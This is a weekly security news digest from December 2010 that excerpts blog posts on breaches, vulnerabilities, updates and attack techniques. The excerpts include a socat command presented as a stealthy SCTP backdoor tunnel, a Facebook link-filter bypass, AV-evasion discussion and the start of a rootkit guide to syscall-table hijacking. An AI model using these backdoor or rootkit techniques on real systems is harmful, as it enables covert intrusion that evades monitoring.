Imagine there is an un-patched Internet Explorer vuln in the wild. While the vendor scrambles to dev/test/QA and prime the release for hundreds of millions of users (I've been there... it takes time), some organizations may choose to adjust their defensive posture by suggesting things like, "Use an alternate browser until a patch is made available".
So, your users happily use FireFox for browsing the Internet, thinking they are safe from any IE 0dayz... after all IE vulnerabilities only affect IE right? Unfortunately, the situation isn't that simple. In some cases, it is possible to control seemingly unrelated applications on the user's machine through the browser

 
Ever tested some of the more exotic transport protocols?
SCTP is interesting ... multihoming means you can have several ips involved on each side of a connection (association in sctp speak) ... so when you move from wired to wireless your ssh session still is fine. If you find a proper SCTP ssh, of course.
Testing it on Ubuntu LTS, though, using socat for glue... a listening SCTP socket is invisible in netstat -ln. Fun. tcp, udp, raw sockets are visible ... but sctp isn't.
socat SCTP-LISTEN:8080,fork TCP-CONNECT:localhost:22
Nice, stealthy backdoor. Does not show in netstat(8) or ss(8). Combine with socat TCP-LISTEN:2223 SCTP-CONNECT:localhost:8080 on a remote host and we have a completely stealthy tunnel, if the firewall is mildly clue-challenged.

 
Recently I've been presenting about 'Wi-Fi (In)Security' on the GOVCERT.NL Symposium 2010 in Rotterdam (November 2010) and (a reduced version) on the 4th CCN-CERT meeting in Madrid (in Spanish; December 2010). The full presentation can be found on Taddong's lab web page. My main goal was to create awareness about all the still prevalent Wi-Fi vulnerabilities, threats, and security risks we are facing both on the wireless infrastructure and the client side. It is almost year 2011, and there is a general feeling that our Wi-Fi environments are pretty secure, as we already have WPA2-Enterprise with multiple authentication methods based on 802.1x/EAP to choose from. However, still there are lots of things to be aware of, specially on the client side (including laptops and mobile devices).
On the infrastructure side, in the best case scenario, we will end up with two worlds, the secure one, based on WPA2-PSK/Enterprise, and the insecure one, based on open Wi-Fi networks (e.g. hotspots) . This is also reflected on the Wi-Fi Alliance roadmap, and it is their goal for 2014 (yes, 3 years from now!).

 
Avoiding AV Detection  [spareclockcycles.org]
As a follow-up to my post on the USB Stick O' Death, I wanted to go a little more in depth on the subject of AV evasion. Following my release of (some of) my code for obfuscating my payload, it became apparent that researchers at various antivirus companies read my blog (Oh hai derr researchers! Great to have you with us! I can haz job?) and updated their virus definitions to detect my malicious payload. To be perfectly honest, I was hoping this would happen, as I figured it would be a teachable moment on just how ineffective current approaches to virus detection can be, give readers a real world look at how AV responds to new threats, and provide one of the possible approaches an attacker would take to evading AV software. My main goal in this research was to see how much effort it would take to become undetectable again, and the answer was 'virtually none'.
In this post, I will first look at how I was able to evade detection by many AV products simply by using a different compiler and by stripping debugging symbols. Then, I will look at how I was able to defeat Microsoft's (and many other AV products') detection mechanisms simply by 'waiting out' the timeout period of their simulations of my program's execution. However, a quick note before we begin: I'm by no means an expert on antivirus, as this exercise was partly to further my understanding of how AV works, and these explanations and techniques are based on my admittedly poor understandings of the technologies behind them. If I mistakenly claim something that isn't true, or you can shed light on some areas that I neglect, please comment. I would love to learn from you.

 
The purpose of this article is to explore the many different forensic artifacts that can be discovered from Windows prefetch files. The first section will briefly cover the prefetch file and the prefetching process. The second section, will discuss the forensic values of the prefetch file, specifically the forensic artifacts the prefetch file contains, and the story that can be revealed by the mere existence or absence of prefetch files. The article will conclude with some examples of how you can use prefetch files to aid in forensic analysis and what to watch out for when using prefetch files to prove or disprove a case.
The main purpose of this article is to explain the use of prefetching in forensic analysis, but it is important to have a baseline understanding of the technology to provide a good foundation for how and why prefetch files contain certain artifacts. The prefetching process utilized by Microsoft was created to speed up the Windows operating system and application startup. The prefetching process occurs when the operating system, specifically the Windows Cache Manager, monitors certain elements of data that are extracted from the disk into memory. This monitoring occurs each time the system is started for the first two minutes of the boot process, then sixty seconds after all the Win32 services have completed their startup, and the first ten seconds after an application is executed.




Secure Development highlights of the week (please remember this and more news related to this category can be found here: Web Technologies):


 
Unencrypted public wifi should die  [lcamtuf.blogspot.com]
Unencrypted public access wireless networks are an unbelievably harmful technology devised with no regard for the operation of the modern web - and they introduce far more problems than immediately apparent. The continued use unencrypted wifi on municipal level and in consumer-oriented settings is simply inexcusable, even if all the major websites on the Internet can be pressured into employing HTTPS-only access and Strict Transport Security by default.
Straightforward snooping and cute tricks such as sslstrip aside - all of them still deadly effective, by the way - there are many less obvious problems we simply can't solve any time soon:

 
How to Conceal XSS Injection in HTML5  [samuli.hakoniemi.net]
I was playing around with window.history object. In general, it's quite limited and can be considered rather useless. However, HTML5 brings some new methods to History object in order to make it more powerful.
In this article I will take a quick glance on a quite peculiar method called pushState(). There is one security related issue I want to point out, which I'm considering rather harmful.
history.pushState()
history.pushState() was introduced in HTML5 and it's meant for modifying history entries.
By using pushState() we're allowed to alter the visible URL in address bar without reloading the document itself. Sounds a bit risky, doesn't it?

 
Once you have deployed ModSecurity, you have probably been faced with this question:
How should I configure my Web Application Firewall (WAF) to handle Authorized Vulnerability Scanning (AVS) traffic?
The answer to this question is not quite as easy as it may first appear. This question arises when organizations are running their own internal web application vulnerability scans. They soon realize that they need to figure out how to get their security tools (scanner and waf) to 'play nice' with each other.
Before deciding on how to reconfigure ModSecurity with regards to handling the scanning traffic, you first must confirm the goal of your scanning efforts. There are usually two main scanning goals:
* To identify all vulnerabilities within a target web application, or
* To identify all vulnerabilities within a target web application that are remotely exploitable by an external attacker.
You may want to reread the seconed item to make sure that you understand the difference, as it is factoring in the exploitability of a vulnerability in a production web application.

 
Attack and Defense Labs  [blog.andlabs.org]
Cracking hashes in the JavaScript cloud with Ravan
Password cracking and JavaScript are very rarely mentioned in the same sentence. JavaScript is a bad choice for the job due to two primary reasons - it cannot run continuously for long periods without freezing the browser and it is way slower than native code.
HTML5 takes care of the first problem with WebWorkers, now any website can start a background JavaScript thread that can run continuously without causing stability issues for the browser. That is one hurdle passed.
The second issue of speed is becoming less relevant with each passing day as the speed of JavaScript engines is increasing at a greater rate than the increase of system speed. It might surprise most people how fast JavaScript actually is, 100,000 MD5 hashes/sec on a i5 machine (Opera). Thats the best number I could get from my system, in most cases it would vary between 50,000 - 100,000 MD5 hashes/sec. This is still about 100-115 times slower than native code on the same machine but that's alright. What JavaScript lacks in outright speed can be more than made up for by its ability to distribute.

 
What's wrong with OpenID?  [www.quora.com]
It boggles my mind that this is apparently a big question for techies and, to me, is a perfect example of the Silicon Valley mindset that doesn't understand how to build products that real people want to use.
The short answer is that OpenID is the worst possible 'solution' I have ever seen in my entire life to a problem that most people don't really have. That's what's 'wrong' with it.
To answer the most immediate question of 'isn't having to register and log into many sites a big problem that everyone has?,' I will say this: No, it's not. Regular normal people have a number of solutions to this problem. Here's some of them:

 
Google or other search engines have been used for many purposes such as finding useful information, important websites and latest news on different topics, Google index a huge number of web pages that are growing daily. From the security prospective these indexed pages may contain different sensitive information.
Google hack involves using advance operators in the Google search engine to locate specific strings of text within search results. Some of the more popular examples are finding specific versions of vulnerable Web applications.




Finally, I leave you with the secure development featured article of the week courtesy of OWASP (Development Guide Series):

Identify interconnections in the Applications environment


-Identify all the interconnections to the application such as through a corporate intranet, the internet, business partner connection, and associated access controls.

  • administrative interfaces or portals separate from normal user application access
  • web service access from other application or over business partner connections
  • Database connections from this application as well as other connections from other applications if the database is shared
-Additionally access to other applications needs to be considered if you plan to redirect a user to another application (internal or external) or use an iframe to present content from another site into your application. All these communications should be considered for how the application will be deployed so that the proper secure access can be built into the design. This includes the proper ingress and egress ports to be opened externally, to business partners of MPLS or IPSec VPNs, or internal to your own network.



-Least privilege should be exercised at every step in the design and deployment phase. All of the components of the application should be identified including all the devices that will be supporting the application.




Source: link



Have a great week, weekend and Merry Christmas!.

Security Weekly News 23 December 2010 - Full List


Category Index




Hacking Incidents / Cybercrime


 
Gardai are expected to send a file to the Director of Public Prosecutions (DPP) in the coming weeks following an investigation into the suspected sale by a civil servant of personal information on hundreds of claim-ants to a private detective.
The civil servant, who was working in the Department of Social Protection, has been suspended and gardai and the Data Protection Commissioner (DPC) have been investigating the incident for a number of weeks.
It is understood the DPC has also raided the private investigator's office and the premises of three insurance firms to gather information on the claimants.

 
SQL Injection Blamed for New Breach  [www.bankinfosecurity.com]
Stronger App Security Could Have Prevented Online Hack
The breach of a Web server that housed payment card data for a New York tourism company's website highlights security gaps in cardholder data protection.
The online breach, which led hackers to cardholder information for 110,000 credit cards, was facilitated via SQL injection -- one of the most frequent modes of attack hackers use to illegally acquire payment-card details.
Twin America LLC (d.b.a., City Sights NY) reportedly discovered the breach in late October, after a programmer noticed unauthorized script had been loaded to the server. The company on Dec. 9 notified the New Hampshire Attorney General of the breach, after it determined that some 300 New Hampshire residents had been impacted by the attack. City Sights' attorney Theodore Augustinos would not comment on the breach, saying he was not authorized to share details beyond those included in the letter to the AG.

 
State-owned Dutch bank ABN Amro has been robbed by computer hackers who stole 5.5 million euros without inside help.
A report in daily about the digital heist is partly denied, however, by the Dutch Association of Banks NVB, which says it is nearly impossible to hack a bank from outside.
Thirteen people have been arrested for the virtual robbery, which took place in March 2010. Sources close to the investigation say that the hackers were able to manipule the bank's account system, but neither police nor ABN Amro are giving any details.
The hackers transferred the money to an accomplice in the town of Wageningen who piped amounts to accounts in Belgium, Hungary and other countries.
The thirteen, who do not all know each other, have been accused of fraud, theft and money laundering. Police found them by tracing the stolen money. Some 2 million euros have been retrieved by ABN Amro, but the remaining amount is still missing.

 
The U.S. Securities and Exchange Commission has accused an Estonian financial firm and two of its employees of carrying out a fraudulent hacking scheme that netted them at least $7.8 million.
The SEC filed an 'emergency federal court action' against Estonian financial services firm Lohmus Haavel & Viisemann and employees Oliver Peek, 24, and Kristjan Lepik, 28.
The agency accused the two of using a so-called spider program to steal information related to more than 360 embargoed press releases in advance of their official distribution date from news and PR Web site Business Wire.
A statement from the SEC claims the stolen information allowed the two to time their trades around the release of news involving mergers, earnings and regulatory action. Using U.S. accounts, the defendants allegedly bought stocks long or sold short.

 
McDonald's and Walgreens this week revealed that data breaches at partner marketing firms had exposed customer information. There has been a great deal of media coverage treating these and other similar cases as isolated incidents, but all signs indicate they are directly tied to a spate of "spear phishing" attacks against e-mail marketing firms that have siphoned customer data from more than 100 companies in the past few months.

 
Hacked corporate blowers in premium rate phreak caper
Romanian police are claiming success in breaking up a cybercrime ring blamed for losses of more than €11m ($14.6 million) through telecoms call charge fraud.
Raids on Tuesday led to the arrest of 42 suspected members of the gang, reckoned to be led by two Romanians, according to Romanian prosecutors.

 
This week I've taken the opportunity to take a closer look at the current ZeuS campaigns. A few of them keep popping up again and again, so I've tried to get some more information about those botnets, their targets as well as the infrastructure that the cybercriminals are using.
In this first blog post I will talk about a ZeuS botnet which I call the "Bozvanovna Botnet", which is being spread using drive-by exploits (hopefully I will find the time to blog about the other botnets that I've found too...).
First of all, let's take a look at the botnet Command&Control infrastructure: The cybercriminals have registered a pretty big amount of domains to serve ZeuS configs and binaries as well as to provide a dropzone for the infected clients (bots) to upload the stolen information. The reason for this is pretty simple: In most cases the domains that get listed on ZeuS Tracker will get nuked quickly. Then the cybercriminals have to register new domains every time the old domains get suspended.

 
* "No legitimate company will ever cold call to tell you your computer has a problem"
The National Consumer Agency and Microsoft Ireland today warned consumers of a scam where cyber criminals call consumers, claiming to be from Microsoft or other legitimate technology companies to tell them they have a virus on their computer.
The scammers then get people to download a file from a website and gain access to their computers where they can see personal details including financial information. In some cases they also ask for credit card details.

 
Suspect lifted other personal information, as well, from computers storing New York state agency data
In yet another instance of an insider going to the dark side, a subcontractor upgrading software for the State of New York's Office of Temporary Disability Assistance has been arrested for allegedly stealing 15,000 Social Security numbers from computers storing the data for the state agency.
Evan Kane, 25, of Waterford, N.Y., has been charged with forgery, possession of a forged instrument, falsifying records, and identity theft, according to published reports.




Unpatched Vulnerabilities


 
A 0-day exploit has been published at exploit-db (see US-Cert advisory) that takes advantage of a memory corruption vulnerability in IIS 7.5's FTP service. This bug will work pre-authentication.
From the looks of it, it is a pure remote exploit that's chief use would be denial of service. As with any memory corruption bugs, it is theoretically possible to use this to gain access to the server with the permissions of the user that is running IIS. I think that would be difficult in this case, but time will tell. It is, nevertheless, a serious bug that at present has no patch. (As of this writing, Microsoft hasn't confirmed it is an issue).

 
Today we released Security Advisory 2488013 to notify customers of a new publicly-disclosed vulnerability in Internet Explorer (IE). This vulnerability affects all versions of IE. Exploiting this vulnerability could lead to unauthorized remote code execution inside the iexplore.exe process.
Proof-of-concept exploit bypasses ASLR and DEP
The Metasploit project recently published an exploit for this vulnerability using a known technique to evade ASLR (Address Space Layout Randomization) and bypass DEP (Data Execution Prevention).
In a few words, Internet Explorer loads mscorie.dll, a library that was not compiled with /DYNAMICBASE (thus not supporting ASLR and being located always at the same base) when processing some html tags. Attackers use these predictable mappings to evade ASLR and bypass DEP by using ROP (return oriented programming) gadgets from these DLLs in order to allocate executable memory, copying their shellcode and jumping into it
...
Recommendation: Use Enhanced Mitigation Experience Toolkit (EMET) to dynamically rebase all loaded DLLs
In order to minimize the risk of exploitation, users could install EMET and proceed to protect the iexplore.exe process as shown in the BlueHat video.




Software Updates


 
MySQL 5.5 released  [www.net-security.org]
MySQL 5.5 delivers significant enhancements enabling users to improve the performance and scalability of web applications across multiple operating environments, including Windows, Linux, Oracle Solaris, and Mac OS

 
Microsoft has withdrawn update KB2412171 for Outlook 2007, released last Patch Tuesday, after a number of user complaints. The changes in the update may have solved some problems, but they also created some. For instance, the update prevents emails from being retrieved from servers that do not support Secure Password Authentication (SPA) even when that option has been selected in the client. Users of Gmail are in particular affected by this issue.

 
Nearly 5 months after arriving in beta form, Microsoft has released version 2 of Security Essentials (MSE), its anti-malware and virus protection software for Windows formerly known as Morro. The major update comes over one year after version 1.0 was released and includes a number of new features and improvements.

 

 
The Google Chrome development team has released Chrome 9.0.597.19, the first beta of version 9 of the company's WebKit-based web browser. Previously only available in the Chrome developer channel (a.k.a. the Dev channel), the first Chrome 9 beta adds a number of security and performance enhancements, as well as new features over the previous version.

 
After a lengthy beta test, Secunia has finally released version 2 of the Personal Software Inspector (PSI). If configured to do so, PSI 2.0 automatically updates most installed programs. The free tool can therefore not only highlight vulnerabilities it detects, but also remedy them, without prompting users.

 
Update: HP says it has identified a potential security issue with the HP StorageWorks P2000 G3 MSA only. This does not impact HP's entire MSA line of storage solutions. An immediate fix for this issue has been identified and customers are rapidly being informed of the solution.

 
New Release of Open Source, Cross-Platform Virtualization Software Delivers Improved Usability, Performance and Scalability
Further enhancing the popular, open source, cross-platform virtualization software, Oracle today announced the availability of Oracle VM VirtualBox 4.0.
Part of Oracle's comprehensive portfolio of virtualization solutions, Oracle VM VirtualBox enables desktop or laptop computers to run multiple guest operating systems simultaneously, allowing users to get the most flexibility and utilization out of their PCs, and supports a variety of host operating systems, including Windows, Mac OS X, most popular flavors of Linux (including Oracle Linux), and Oracle Solaris.

 
A buffer overflow flaw in the open source smart card library OpenSC can be exploited to inject and execute malicious code on a system. According to UK security company MWR InfoSecurity, the bug in the library is triggered when reading serial numbers from smart cards. The card-atrust-acos.c, card-acos5.c and card-starcos.c drivers in OpenSC version 0.11.1 are all affected.




Business Case for Security


 
Debora Plunkett, head of the NSA's Information Assurance Directorate, has confirmed what many security experts suspected to be true: no computer network can be considered completely and utterly impenetrable - not even that of the NSA.
'There's no such thing as 'secure' any more,' she said to the attendees of a cyber security forum sponsored by the Atlantic and Government Executive media organizations, and confirmed that the NSA works under the assumption that various parts of their systems have already been compromised, and is adjusting its actions accordingly.

 
We recently met with leaders from the U.S. financial services sector, and they asked a number of questions about recent trends in insider threat activities. We are often asked these types of questions, and we can answer many of them right away. Others require more extensive data mining in our case database. In this entry, we address the following question:
Between current employees, former employees, and contractors,
is one group most likely to commit these crimes?
The answer to this question has some important implications, and not just for these particular meeting attendees. If, across all types of incidents and all sectors, the vast majority of incidents are caused by current, full-time employees, organizations may focus on that group to address the vulnerability. If, on the other hand, there are a large number of part-time contractors or former employees, there may be different controls that an organization should consider using.

 
The Cost of Insecurity 2010  [www.quantainia.com]
2010 has been notable for a number of reasons, the advent of a coalition government in the UK, followed by swinging spending cuts, and a turbulent economic picture. In a regulatory sense, too, 2010 stands out: increasingly active regulators have increased fines for organisations which are found to have failed to comply with basic levels of protection around data. A new record was set with the £17.5 million FSA fine on Goldman Sachs. Moreover, the emphasis has broadened - rather than the ICO and FSA focusing solely on the financial sector. Both Hertfordshire County Council and A4E were the subject of fines for weak controls around personal data. At the same time, other regulation continues to apply - many organisations are struggling with PCI-DSS compliance, not only in the commercial sector, but also in the state sector, where cards are important for covering payments for basic services.

 
In our introduction to this series we mentioned that the current practice of incident response isn't up to dealing with the compromises and penetrations we see today. It isn't that the incident response process itself is broken, but how companies implement response is the problem.
Today's incident responders are challenged on multiple fronts. First, the depth and complexity of attacks are significantly more advanced than commonly discussed. We can't even say this is a recent trend -- advanced attacks have existed for many years -- but we do see them affecting a wider range of organizations, with a higher degree of specificity and targeting than ever before. It's no longer merely the defense industry and large financial institutions that need to worry about determined persistent attackers. In the midst of this onslaught, the businesses we protect are using a wider range of technology -- including consumer tools -- in far more distributed environments. Finally, responders face the dual-edged sword of a plethora of tools; some of them are highly effective, and others that contribute to information overload.

 
Inside the business of malware  [www.computerschool.org]

 
The data breach at gossip website Gawker Media highlights the needs for companies to balance the costs of taking information security measures with the risks of losing sensitive data, according to Cisco analysts.
Hackers recently compromised the Gawker Media servers and leaked some 1.4 million user passwords and other confidential information. In a Dec. 17 memo, Gawker Media's chief technology officer Thomas Plunkett explained how the data breach happened.
"In recent weeks, intruders were able to gain access to our web servers by exploiting a vulnerability in our source code, allowing them to gain access to user data and passwords. With this information, they were able to gain access to the editor wiki, some Gawker Media email accounts, and other external resources. It is clear that the Gawker tech team did not adequately secure our platform from an attack of this nature. We were also not prepared to respond when it was necessary."

 
The length of time between when a developer writes a vulnerable piece of code and when the issue is reported by a software security testing process is vitally important. The more time in between, the more effort the development group must expend to fix the code. Therefore the speed and frequency of the testing process whether going with dynamic scanning, binary analysis, pen-testing, static analysis, line-by-line source code review, etc. matters a great deal.

 
With the holidays approaching, many people are looking for gift ideas and deals. Holiday season is also hunting season for malicious hackers who send out gift idea and deal phishing emails.
How do you protect your employees from divulging their personal and even corporate passwords to an attacker? It's hard to combat phishing with technology. Training employees to spot phishing scams is the most effective, but training is time intensive and may impact productivity.

 
Exploitation of just ONE software vulnerability is typically all that separates the bad guys from compromising an entire machine. The more complicated the code, the larger the attack surface, and the popularity of the product increases the likelihood of that outcome. Operating systems, document readers, Web browsers and their plug-ins are on today's front lines. Visit a single infected Web page, open a malicious PDF or Word document, and bang -- game over. Too close for comfort if you ask me. Firewalls, IDS, anti-malware, and other products aren't much help. Fortunately, after two decades, I think the answer is finally upon us.

 
Once upon a time, I was retained to create a comprehensive PCI DSS-focused log review policies, procedures and practices for a large company. It is focused on PCI DSS, but based on generally useful log review practices that can be utilized by everybody and with any regulation or without any compliance flavor at all.
This is the 11th post in the long, long series (part 1, part 2, part 3 - all parts). A few tips on how you can use it in your organization can be found in Part 1. You can also retain me to customize or adapt it to your needs.
And so we continue with our Complete PCI DSS Log Review Procedures (please read in order- at this point we are pretty deep in the details and this piece might look out of context):

 
More than 60 percent of respondents have tried multiple anti-virus products over the course of a year, according to Avira. In addition, 25 percent of the users admitted to turning off their anti-virus protection because they thought those programs were slowing down their computers.




Web Technologies


 
Unencrypted public wifi should die  [lcamtuf.blogspot.com]
Unencrypted public access wireless networks are an unbelievably harmful technology devised with no regard for the operation of the modern web - and they introduce far more problems than immediately apparent. The continued use unencrypted wifi on municipal level and in consumer-oriented settings is simply inexcusable, even if all the major websites on the Internet can be pressured into employing HTTPS-only access and Strict Transport Security by default.
Straightforward snooping and cute tricks such as sslstrip aside - all of them still deadly effective, by the way - there are many less obvious problems we simply can't solve any time soon:

 
How to Conceal XSS Injection in HTML5  [samuli.hakoniemi.net]
I was playing around with window.history object. In general, it's quite limited and can be considered rather useless. However, HTML5 brings some new methods to History object in order to make it more powerful.
In this article I will take a quick glance on a quite peculiar method called pushState(). There is one security related issue I want to point out, which I'm considering rather harmful.
history.pushState()
history.pushState() was introduced in HTML5 and it's meant for modifying history entries.
By using pushState() we're allowed to alter the visible URL in address bar without reloading the document itself. Sounds a bit risky, doesn't it?

 
There's a remarkable flaw in Amazon's web shop (tested on .de, co.uk, .com): It's a stored XSS vulnerability. So far so, good what's new? - is probably what you're thinking - XSS problems had Amazon and other major companies too in the past.
'WAHH' revealing Amazon cookies under Vista/IE8
Picture 1: Web Application Hacker's Handbook (a.k.a. WAHH) exploiting Amazon (IE under Vista)
This one is different though. Whereas the standard example for a stored XSS vulnerability over an out-of-band channel is a web mailer like OWA using SMTP here this channel for the attack is kind of - err, let's put it this way - unusual: One has to write a book! No, I am serious. This book needs to contain a crafted string so that it bypasses their weak/not existing filters/encodings and of course this book needs to be sold through Amazons shop and last but not least Amazon has to offer the 'search in this book' functionality.

 
Facebook is using "facebook.com/l.php?u=THE_External_URL" whenever you click on an external link; and as a result:
1- Your current page won't be sent via the "Referer" section of the HTTP header. So, it is useful for the privacy.
2- It is possible to stop malicious or unwanted links by using a single point ("l.php" page).
Now, I want to show a flaw in this process in which by clicking on an external URL in Facebook, users can go directly to the destination URL without passing the "facebook.com/l.php" page:
Add a ":/" at the end of the domain name! That's it!

 
Once you have deployed ModSecurity, you have probably been faced with this question:
How should I configure my Web Application Firewall (WAF) to handle Authorized Vulnerability Scanning (AVS) traffic?
The answer to this question is not quite as easy as it may first appear. This question arises when organizations are running their own internal web application vulnerability scans. They soon realize that they need to figure out how to get their security tools (scanner and waf) to 'play nice' with each other.
Before deciding on how to reconfigure ModSecurity with regards to handling the scanning traffic, you first must confirm the goal of your scanning efforts. There are usually two main scanning goals:
* To identify all vulnerabilities within a target web application, or
* To identify all vulnerabilities within a target web application that are remotely exploitable by an external attacker.
You may want to reread the seconed item to make sure that you understand the difference, as it is factoring in the exploitability of a vulnerability in a production web application.

 
I'm attaching two CSV files for use in test cases and tools. The uni2asc.csv contains all of the Unicode characters that map to something ASCII < 0×80. The bestfit.csv contains all of the known best-fit mappings to dangerous ASCII between legacy charsets and Unicode.
uni2asc.csv - for straight Unicode to Unicode mappings
bestfit.csv - for legacy charset to Unicode mappings

 
Attack and Defense Labs  [blog.andlabs.org]
Cracking hashes in the JavaScript cloud with Ravan
Password cracking and JavaScript are very rarely mentioned in the same sentence. JavaScript is a bad choice for the job due to two primary reasons - it cannot run continuously for long periods without freezing the browser and it is way slower than native code.
HTML5 takes care of the first problem with WebWorkers, now any website can start a background JavaScript thread that can run continuously without causing stability issues for the browser. That is one hurdle passed.
The second issue of speed is becoming less relevant with each passing day as the speed of JavaScript engines is increasing at a greater rate than the increase of system speed. It might surprise most people how fast JavaScript actually is, 100,000 MD5 hashes/sec on a i5 machine (Opera). Thats the best number I could get from my system, in most cases it would vary between 50,000 - 100,000 MD5 hashes/sec. This is still about 100-115 times slower than native code on the same machine but that's alright. What JavaScript lacks in outright speed can be more than made up for by its ability to distribute.

 
WebKit CSS Type Confusion  [em386.blogspot.com]
Here is an interesting WebKit vulnerability I came across and reported to Google, Apple and the WebKit.org developers.
Description: WebKit CSS Parser Type Confusion
Software Affected: Chrome 7/8, Safari 5.0.3, Epiphany 2.30.2, WebKit-r72146 (others untested)
Severity: Medium
The severity of the vulnerability was marked Medium by the Chrome developers because the bug can only result in an information leak. I don't have a problem with that but I have some more thoughts on it at the end of the post. But first the technical details.

 
If you're a Mac or iOS developer and happen to have an iPhone, iPod Touch or iPad running the iBooks app, go open the iBookstore and search for "apple developer". As you can see, Apple is offering iOS / Mac development iBooks completely for free.

 
Windows Live has just announced something new for Hotmail: Interactive e-mail.
The e-mail giant is allowing developers to embed and run JavaScript from within e-mails; this is the natural next step in e-mail's evolution from plain text to HTML and beyond.
What this means for the average e-mail recipient is that more of the messages they receive will be increasingly up-to-date, and content will be interactive. If the developer sending the e-mail is hip to Hotmail's changes, you'll be able to take actions from within the e-mail itself without having to navigate to a slew of other web pages. Basically, the new Hotmail e-mails will look, feel and behave like a web page running within an e-mail.

 
What's wrong with OpenID?  [www.quora.com]
It boggles my mind that this is apparently a big question for techies and, to me, is a perfect example of the Silicon Valley mindset that doesn't understand how to build products that real people want to use.
The short answer is that OpenID is the worst possible 'solution' I have ever seen in my entire life to a problem that most people don't really have. That's what's 'wrong' with it.
To answer the most immediate question of 'isn't having to register and log into many sites a big problem that everyone has?,' I will say this: No, it's not. Regular normal people have a number of solutions to this problem. Here's some of them:

 
Google or other search engines have been used for many purposes such as finding useful information, important websites and latest news on different topics, Google index a huge number of web pages that are growing daily. From the security prospective these indexed pages may contain different sensitive information.
Google hack involves using advance operators in the Google search engine to locate specific strings of text within search results. Some of the more popular examples are finding specific versions of vulnerable Web applications.




Network Security


 
Imagine there is an un-patched Internet Explorer vuln in the wild. While the vendor scrambles to dev/test/QA and prime the release for hundreds of millions of users (I've been there... it takes time), some organizations may choose to adjust their defensive posture by suggesting things like, "Use an alternate browser until a patch is made available".
So, your users happily use FireFox for browsing the Internet, thinking they are safe from any IE 0dayz... after all IE vulnerabilities only affect IE right? Unfortunately, the situation isn't that simple. In some cases, it is possible to control seemingly unrelated applications on the user's machine through the browser

 
Ever tested some of the more exotic transport protocols?
SCTP is interesting ... multihoming means you can have several ips involved on each side of a connection (association in sctp speak) ... so when you move from wired to wireless your ssh session still is fine. If you find a proper SCTP ssh, of course.
Testing it on Ubuntu LTS, though, using socat for glue... a listening SCTP socket is invisible in netstat -ln. Fun. tcp, udp, raw sockets are visible ... but sctp isn't.
socat SCTP-LISTEN:8080,fork TCP-CONNECT:localhost:22
Nice, stealthy backdoor. Does not show in netstat(8) or ss(8). Combine with socat TCP-LISTEN:2223 SCTP-CONNECT:localhost:8080 on a remote host and we have a completely stealthy tunnel, if the firewall is mildly clue-challenged.

 
So I started this series on Network Reliability Mechanisms back in September ( http://isc.sans.edu/diary.html?storyid=9583 ), and with work and life and the rest, I realized that I've let the promised installments in this series slide a bit.
In today's diary we'll explore and compromise HSRP - Cisco's Hot Standby Routing Protocol. Why would you want to do this you ask? You may remember some of our previous diaries on ARP Poisoning Man in the Middle attacks (for instance, this one ==> http://isc.sans.edu/diary.html?storyid=7303 ), and protections against them ( http://isc.sans.edu/diary.html?storyid=7567 ). Hijacking a redundancy protocol like HSRP allows you to bypass all of these layer 2 protections by simply participating in the (legitimate) HSRP exchange.

 
Users of the popular exim mail server report attacks exploiting the recently patches vulnerability [1,2]. It appears that the attacks are scripted and installing popular rootkits. If you experienced an attack against exim: We are interested in packet captures or other logs showing how the attack is performed.

 
Recently I've been presenting about 'Wi-Fi (In)Security' on the GOVCERT.NL Symposium 2010 in Rotterdam (November 2010) and (a reduced version) on the 4th CCN-CERT meeting in Madrid (in Spanish; December 2010). The full presentation can be found on Taddong's lab web page. My main goal was to create awareness about all the still prevalent Wi-Fi vulnerabilities, threats, and security risks we are facing both on the wireless infrastructure and the client side. It is almost year 2011, and there is a general feeling that our Wi-Fi environments are pretty secure, as we already have WPA2-Enterprise with multiple authentication methods based on 802.1x/EAP to choose from. However, still there are lots of things to be aware of, specially on the client side (including laptops and mobile devices).
On the infrastructure side, in the best case scenario, we will end up with two worlds, the secure one, based on WPA2-PSK/Enterprise, and the insecure one, based on open Wi-Fi networks (e.g. hotspots) . This is also reflected on the Wi-Fi Alliance roadmap, and it is their goal for 2014 (yes, 3 years from now!).

 
There were some pretty wild accusations made about backdoors being placed in OpenBSD's IPsec implementation by it's authors. Normally this type of thing isn't worth a mention, but in this case the accusations were specific enough to be testable. Having no other projects to work on (that was a joke), I decided it might be interesting to dive into the code.
I did find something interesting.
OpenBSD did, in fact, ship with a bug which prevented IPsec packets from being properly authenticated for a few releases near the time in question. The bug was patched silently, no security advisory was issued. The developer who introduced it and the developer who later patched it were said to have been funded by the same company, the one alleged to have coordinated the backdoors.

 
Well, we've got something that works. So, of course we have to muck with it :)
The immediate architectural question is whether we should support the storage of full keying data in DNS. See, right now, we're just storing the hash of keying data - a nice, fixed size blob that can fit into a text record without much fuss. There's a fundamental assumption with this approach: Any protocol we happen to use, will negotiate a public key (presently inside a certificate) at the application layer. DNSSEC only needs to be used to validate the data received at that layer.

 
Unencrypted public wifi should die  [lcamtuf.blogspot.com]
Unencrypted public access wireless networks are an unbelievably harmful technology devised with no regard for the operation of the modern web - and they introduce far more problems than immediately apparent. The continued use unencrypted wifi on municipal level and in consumer-oriented settings is simply inexcusable, even if all the major websites on the Internet can be pressured into employing HTTPS-only access and Strict Transport Security by default.
Straightforward snooping and cute tricks such as sslstrip aside - all of them still deadly effective, by the way - there are many less obvious problems we simply can't solve any time soon:

 
Over the past few months, we have put Mallory through its paces. Scores of mobile applications have had their network streams MiTMd by Mallory. It has become one of a few important tools that we use on a daily basis. Because we use it so often, we sometimes forget that it may seem quite difficult to get up and running for the first time. Mallory is still actively developed. Improving the user experience from the initial code checkout to helping users "Mallorize" traffic is a key goal for the project. However, until then, this howto guide will suffice to get Mallory up and running for your testing needs.
This guide will explain how to get Mallory up and running (in this guide I use an EeePC). I also use a tethered Android device for a WAN connection, and have MiTM victims connect to the netbook over its WiFi connection. I will also be sharing how we use a tool called hostapd to make our EeePC look like an infrastructure mode WiFi access point, as opposed to an Ad-Hoc WiFi access point. Using this guide, you should be able to set up a mobile Mallory gateway in no time.

 
In this guide I will explain how to hijack the syscall in kernel 2.6.*: in particular how to bypass the kernel write protection and the "protected mode" bit of the CR0 CPUs register.
I don't explain what is a syscall or syscall table: I assume you know what it is.
- Accessing to Syscall Table
If you have tried to execute rootkit wrote for 2.4.* kernels then you will know that them don't work in the 2.6.* kernel systems.
In kernel 2.6.* the "sys_call_table" is no longer exported and you can't access it directly: moreover the memory pages in which the table resides are now write-protected.
So we can no longer access the table in this way:
extern void *sys_call_table[];
...
sys_call_table[__NR_syscall] = pointer

 
